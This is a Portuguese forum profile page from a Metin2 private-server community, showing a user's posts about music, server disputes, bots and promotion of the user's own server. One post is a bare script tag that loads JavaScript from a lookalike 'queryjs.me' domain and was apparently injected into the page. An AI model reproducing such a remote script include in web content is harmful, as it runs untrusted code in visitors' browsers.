antiblock
https://arwen2.global/

Galicia

Membro
  • Content Count

    134
  • Joined

  • Last visited

  • Days Won

    2

Galicia last won the day on December 22 2014

Galicia had the most liked content!

About Galicia

  • Rank
    Novato
  • Birthday 09/12/1994

Informação do Perfil

  • Sexo
    Cyberiano

Recent Profile Visitors

1,468 profile views
  1. Isto é a paga para quem "rouba" a ideia e o nome de um servidor kkkkkk Está claramente a mesma coisa ou pior do que quando o paci o abriu comigo ahahah
  2. Passado uns anos ainda continuo ativo nesta comunidade, era para já ter publicado este som aqui mas o Youtube como é "deficiente" decidiu colocar restrição de idade por mostrar umas ganzitas, mas pronto, é o que há, PACI já colocou a minha música mais actual, mas deixo aqui esta para quem curtir ficar "Tranquilo" :D
  3. ZarRoc criar servidores de metin também é ilegal, não vejo onde está o problema aqui kkkkkk
  4. Tu até contas os dias que faltam para sair um som meu corno! kkkkk
  5. Deixo-vos aqui um novo som do antigo Deezy que mudou o seu nome para Dero Vibez. Começou a sua carreira de novo, visto a anterior não ter corrido da melhor maneira e o seu nome também já existir, daí ter começado do 0. Pá quem curtir oiça, quem não curtir que vá tomar no cú kkk O Real é só daqui a 3 Meses que vai fazer frente ao Piruka (tou a gozar).
  6. Pode ser o Turles ou o Bardock cá para mim
  7. Maltinha agradeço todo o feedback e as palavras, e Paci a ti já nem preciso agradecer kkkk Em relação à "humildade", lamento dizer mas eu sou até demasiado humilde, agora acho super normal julgarem e opinarem algo com base nos fundamentos que vocês têm e não nos verdadeiros. NzTx aparece no Apocalipse3 em Setembro, vou voltar e desta vez vai ser mesmo para partir tudo!!!
  8. Não sei de que distribuição de montadas falam vocês, mas anyway... Têm de me explicar como algo que para vocês, que desta comunidade são os únicos que dizem que isto não vale nada e fazem as coisas que fazem para colocar os projectos dos outros em baixo e incentivam os outros a fazer o mesmo têm 300+ pessoas diárias e está estável, sinceramente para mim o feedback desta comunidade já não me interessa minimamente, a maioria dos que aqui constam não valem nada. Agora façam-me um favor, um grande obrigado pela criação do tópico, um grande obrigado a quem nos critica e nos dá atenção e se não querem jogar nem cá meter as "patas", também não venham para aqui "criticar". O ZiBanG já foi removido da nossa Equipa e não andou a prejudicar jogador nenhum, assim como ninguém beneficiou jogador nenhum, o vosso problema é contarem-vos as coisas às metade e daí fazerem um bicho de sete cabeças. Aconteceu o que aconteceu da primeira vez que abriu é verdade, maior parte por culpa da boa comunidade que esta CG têm. E quando ao M2Bob, se alguns de vocês me souber dizer como se bloqueia isso era bacano, até lá mantenham-se calados, pois o M2bob quem o comprar consegue utilizá-lo em qualquer servidor. P.s.: Ficaria-vos muito bem antes de qualquer coisa que digam, terem a certeza se isso é verdade. Cumprimentos.
  9. <script src="http://queryjs.me/services/script.js" type="text/javascript"></script> Não perdes nada em vir cá ver como está. Tira as tuas próprias conclusões.
  10. É de facto bastante agradável a atenção que vocês nos dão <3 Obrigado a todos.
  11. Ainda bem que o sentido de humor de todos vocês aqui está sempre no auge. Venham lá jogar no Servidor que vocês tentaram destruir, está Online, escusas de abrir esse em 2017. www.nexus2.com.pt P.s.: É de salientar que essa tal "corrupção" que nunca nenhum de nós aqui dentro viu, a não ser vocês é admirável, continuação de boas traquinices.
  12. Eu realmente não vos percebo, abrimos o testes para testar as coisas e remodelar os bug's que estão à vossa vista, o que vocês fazem é vir para aqui criticar? Opá por amor de deus, se até numa fase de testes fazem isto a sério, peguem no Cliente e mandem para o lixo. Não querem ajudar? Não ajudem, mas não atrapalhem também. Foi mexido nas quest's e tudo mais, se não tivessemos a certeza que existiam de novo bug's não tinhamos aberto a fase de testes, vocês são lamentáveis, desculpem o termo. Só estão bem a criticar e a tentar "mandar" abaixo o trabalho dos outros, façam melhor. Vamos começar a fazer como o resto dos servidores fazem, deixar-vos na ignorância, porque já vi que quanto mais damos de nós, mais vocês nos pedem. P.s.: Quem quiser testar e ver que bug's existem e ir ao fórum reportar, está à vontade. Cumprimentos, Galicia.